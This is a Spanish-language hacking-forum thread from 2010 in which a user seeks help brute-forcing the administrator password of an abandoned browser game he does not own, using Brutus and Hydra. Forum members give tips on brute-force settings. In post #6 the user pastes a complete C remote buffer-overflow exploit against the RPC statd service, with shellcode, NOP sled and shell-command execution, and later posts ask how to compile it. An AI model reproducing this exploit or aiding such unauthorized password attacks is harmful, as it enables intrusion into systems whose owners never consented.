Resultados 1 al 11 de 11

Duda/problema con el brutus al intentar sacar el user/pass del admin de una web

  1. #1 Duda/problema con el brutus al intentar sacar el user/pass del admin de una web 
    Iniciado
    Fecha de ingreso
    Sep 2010
    Mensajes
    6
    Descargas
    1
    Uploads
    0
    Saludos peña.
    He intentado sacar el password del administrador de un juego browser (o como se llamen, los de pagina web lol) con el brutus, pero se para a los pocos intentos, la web en cuestion esta dejada de la mano de dios desde hace un año, y lo mas seguro es que cierren el juego en breve, no tiene nadie del staff activo, vamos, que sudan de el (la ultima actualizacion fue hace mas de un año!) pero a mi me gusta, y para lo poco que le queda de vida me gustaria trastearlo un poco, el tema es que no tengo ni puñetera idea de como sacarle el password (tampoco estoy seguro de que el username sea el correcto lol) me he mirado el foro pero las guias del brutus no dicen nada de que se pare a los pocos intentos, he probado a usar los diccionarios que rulan por el foro para descargarse, y se para igualmente, en lo que seria el "informe" me salia el username como admin y los passwords letras sueltas en cada intento, no se en que meto la gamba. Si alguien tiene idea de lo que me falta seria la ostia! si quereis la direccion de la web o la ip de la misma os la paso cagando ostias lol asi a lo mejor sera mas facil para decirme como debo usar el brutus con ella, paso de ponerla y hacerles propaganda LOL.
    Gracias de antemano gente!
    Citar  
     

  2. #2  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    La mayoría de las webs (las que están bien hechas) te obligarán a resolver un CAPTCHA después de unos intentos fallidos, o si no, te bloquearán la dirección IP.
    Citar  
     

  3. #3  
    Iniciado
    Fecha de ingreso
    Sep 2010
    Mensajes
    6
    Descargas
    1
    Uploads
    0
    No tiene captcha, te sale la tipica pantalla donde te indica que el user/pass no es el correcto (he probado un user y un pass incorrecto unas 30 veces y sigue saliendo lo mismo, y el brutus se para con menos intentos)
    Como esta en decadencia ni uso proxy ni nada, directamente y si cuela cuela, pero no tengo ni idea de por que no sigue intentandolo el programa, me da igual que tarde meses.
    gracias por contestar tan rapido.
    Citar  
     

  4. #4  
    Iniciado
    Fecha de ingreso
    Sep 2010
    Mensajes
    6
    Descargas
    1
    Uploads
    0
    Edit:
    Lo habia compilado mal, ahora he usado el cygwin pero me sale "acceso denegado" cuando intento compilarlo, el exploit es para C y es para bugffer overflow
    Última edición por VeNtRuE; 13-09-2010 a las 18:40
    Citar  
     

  5. #5  
    Moderador HH
    Fecha de ingreso
    Apr 2010
    Mensajes
    1.052
    Descargas
    7
    Uploads
    0
    la mayoria de los nuevos servidores bloquean la fuerza bruta. El brutus tiene una opcion de la fuerza bruta, el range. Determina el tipo de contraseñas. Con numeros y letras, con simbolos... Etc. Mira eso. Has encontrado un bug que explotar en la pagina?
    • Taller de programación HackHispano: http://tallerdeprogramacion.es
    • Wargame HackHispano: [PRÓXIMAMENTE]
    • Normas del foro: http://foro.hackhispano.com/announcement.php?f=2
    Citar  
     

  6. #6  
    Iniciado
    Fecha de ingreso
    Sep 2010
    Mensajes
    6
    Descargas
    1
    Uploads
    0
    *buffer no bugfer se me fue la olla. sigo sin poder compilar el exploit, me sale siempre el mensaje de "acceso denegado", y no tengo ni idea del porque, me he bajado todos los paquetes del cygwin (menudo coñazo lol) he comprobado que esten los necesarios, pero aun asi no me deja, me jhe bajado el dev c++ pero no tengo ni idea de si funcionara en el, a todo esto el exploit que me sale en la pagiina que te manda el SSS es este

    Código:
    #include <sys/types.h>
    #include <sys/time.h>
    #include <stdio.h>
    #include <string.h>
    #include <netdb.h>
    #include <rpc/rpc.h>
    #include <rpcsvc/sm_inter.h>
    #include <sys/socket.h>
    
    #define BUFSIZE 1024
    #define ADDRS 2+1+1+4
    #define ADDRP 0x8045570;
    
    /* up to ~ 150 characters, there must be three strings */
    char *cmd[3]={"/bin/sh", "-c", "touch /tmp/blahblah"};
    
    char asmcode[]="\xeb\x3c\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\xf7\x83\xc7\x10\x89\x3e\x4f\x47\xfe\x07\x75\xfb\x47\x89\x7e\x04\x4f\x47\xfe\x07\x75\xfb\x47\x89\x7e\x08\x4f\x47\xfe\x07\x75\xfb\x89\x46\x0c\x50\x56\xff\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x0
    
    
    1\x07\x07\xe8\xbf\xff\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02";
    char nop[]="\x90";
    
    char code[4096];
    
    void usage(char *s) {
      printf("Usage: %s host [cmd]\n", s);
      exit(0);
    }
    
    main(int argc, char *argv[]) {
      CLIENT *cl;
      enum clnt_stat stat;
      struct timeval tm;
      struct mon monreq;
      struct sm_stat_res monres;
      struct hostent *hp;
      struct sockaddr_in target;
      int sd, i, noplen=strlen(nop);
      char *ptr=code;
    
      if (argc < 2)
        usage(argv[0]);
      if (argc == 3)
        cmd[2]=argv[2];
    
      for (i=0; i< sizeof(code); i++)
        *ptr++=nop[i % noplen];
    
      strcpy(&code[750], asmcode);  /* XXX temp. */
      ptr=code+strlen(code);
      for (i=0; i<=strlen(cmd[0]); i++)
        *ptr++=cmd[0][i]-1;
      for (i=0; i<=strlen(cmd[1]); i++)
        *ptr++=cmd[1][i]-1;
      for (i=0; i<=strlen(cmd[2]); i++)
        *ptr++=cmd[2][i]-1;
      ptr=code+BUFSIZE-(ADDRS<<2);
      for (i=0; i<ADDRS; i++, ptr+=4)
        *(int *)ptr=ADDRP;
      *ptr=0;
    
      printf("strlen = %d\n", strlen(code));
    
      memset(&monreq, 0, sizeof(monreq));
      monreq.mon_id.my_id.my_name="localhost";
      monreq.mon_id.my_id.my_prog=0;
      monreq.mon_id.my_id.my_vers=0;
      monreq.mon_id.my_id.my_proc=0;
      monreq.mon_id.mon_name=code;
    
      if ((hp=gethostbyname(argv[1])) == NULL) {
        printf("Can't resolve %s\n", argv[1]);
        exit(0);
      }
      target.sin_family=AF_INET;
      target.sin_addr.s_addr=*(u_long *)hp->h_addr;
      target.sin_port=0;    /* ask portmap */
      sd=RPC_ANYSOCK;
    
      tm.tv_sec=10;
      tm.tv_usec=0;
      if ((cl=clntudp_create(&target, SM_PROG, SM_VERS, tm, &sd)) == NULL) {
        clnt_pcreateerror("clnt_create");
        exit(0);
      }
      stat=clnt_call(cl, SM_MON, xdr_mon, (char *)&monreq, xdr_sm_stat_res,
                    (char *)&monres, tm);
      if (stat != RPC_SUCCESS)
        clnt_perror(cl, "clnt_call");
      else
        printf("stat_res = %d.\n", monres.res_stat);
      clnt_destroy(cl);
    }
    ni idea de si rulara o no lol
    Citar  
     

  7. #7  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Citar  
     

  8. #8  
    Iniciado
    Fecha de ingreso
    Sep 2010
    Mensajes
    6
    Descargas
    1
    Uploads
    0
    me he bajado el hydra ese, pero no se como instalarlo o usarlo.

    Código:
    HOW TO USE
    ----------
    Type "./configure", followed by "make" to compile hydra and then
    "./hydra -h" to see the command line options.
    You make also type "make install" to install hydra to /usr/local/bin.
    Note that NO login/password file is included. Generate them yourself.
    For Linux users, a GTK gui is available, try "./xhydra"
    no se donde meterle esos comandos, en el ms2 no me los reconoce, he probado a hacerlo con el cygwin pero tampoco me deja

    Código:
    HOW TO COMPILE
    --------------
    Type "./configure" and then "make" and "make install".
    If you have CYGWIN, you have to follow the instructions "./configure" prints
    after running.
    For PalmPilot, run "./configure-palm".
    For ARM processor mobiles, run "./configure-arm".
    esta es la parte que mas me interesaba pero me pasa exactamente lo mismo, soy incapaz de hacerlo funcionar lol
    Citar  
     

  9. #9  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Necesitas un compilador de cygwin o algo así. Nunca he compilado nada en Windows, no te puedo ayudar.
    Citar  
     

  10. #10  
    Iniciado
    Fecha de ingreso
    Sep 2010
    Mensajes
    6
    Descargas
    1
    Uploads
    0
    he solucionado el problema de acceso denegado, tenia que tocar la pestaña de seguridad (Para ver la ficha Seguridad en Opciones de carpeta,en la ficha Ver, bajo Configuración avanzada, desactive la casilla Utilizar uso compartido simple de archivos [recomendado].)
    ahora me deja usar el gcc, pero me da error al usarlo (La CPU MTVDM ha encontrado una instrucción no permitida. CS:073b IP:21c6 OP:63 6c 61 64 6f Elija"Cerrar" para finalizar la aplicación)
    Estoy por buscar directamente el exploit compilado por que al final me voy a volver loco.
    Citar  
     

  11. #11  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    O instalar algún GNU/Linux, aunque sea en una máquina virtual.
    Citar  
     

Temas similares

  1. ¿Existe archivo de user & pass de PC?
    Por TigerWolf en el foro GENERAL
    Respuestas: 6
    Último mensaje: 12-10-2011, 04:11
  2. crackear admin/pass
    Por neo-hell en el foro GENERAL
    Respuestas: 4
    Último mensaje: 29-09-2010, 12:09
  3. logearte en web sin user ni pass
    Por esgoru en el foro GENERAL
    Respuestas: 8
    Último mensaje: 28-01-2010, 15:58
  4. pass/user de SpeedStream 5660 XD
    Por x2_nm en el foro GENERAL
    Respuestas: 2
    Último mensaje: 04-12-2002, 14:04
  5. pass/user de SpeedStream 5660 XD
    Por x2_nm en el foro REDES Y TECNOLOGIAS WIRELESS
    Respuestas: 0
    Último mensaje: 28-11-2002, 20:34

Etiquetas para este tema

Marcadores

Marcadores